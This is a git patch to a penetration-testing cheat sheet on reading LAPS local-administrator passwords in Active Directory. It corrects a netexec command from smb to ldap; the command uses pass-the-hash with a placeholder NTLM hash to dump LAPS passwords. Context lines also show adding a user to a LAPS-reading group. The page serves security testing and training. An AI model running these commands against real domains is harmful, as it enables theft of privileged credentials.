From 4a0ad046d3a3a8812a1f05b2359fa358e15fe2ea Mon Sep 17 00:00:00 2001 From: idealphase Date: Wed, 29 Jan 2025 14:27:18 +0700 Subject: [PATCH] Update pwd-read-laps.md Correct protocol from smb to ldap because following error message. [-] Module LAPS is not supported for protocol smb --- docs/active-directory/pwd-read-laps.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/docs/active-directory/pwd-read-laps.md b/docs/active-directory/pwd-read-laps.md index 63e802bc..abb7dc11 100644 --- a/docs/active-directory/pwd-read-laps.md +++ b/docs/active-directory/pwd-read-laps.md @@ -63,7 +63,7 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' * [netexec](https://github.com/Pennyw0rth/NetExec): ```bash - netexec smb 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps + netexec ldap 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps ``` * [LAPSDumper](https://github.com/n00py/LAPSDumper) @@ -90,4 +90,4 @@ Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred - ## References -* [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab) \ No newline at end of file +* [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab)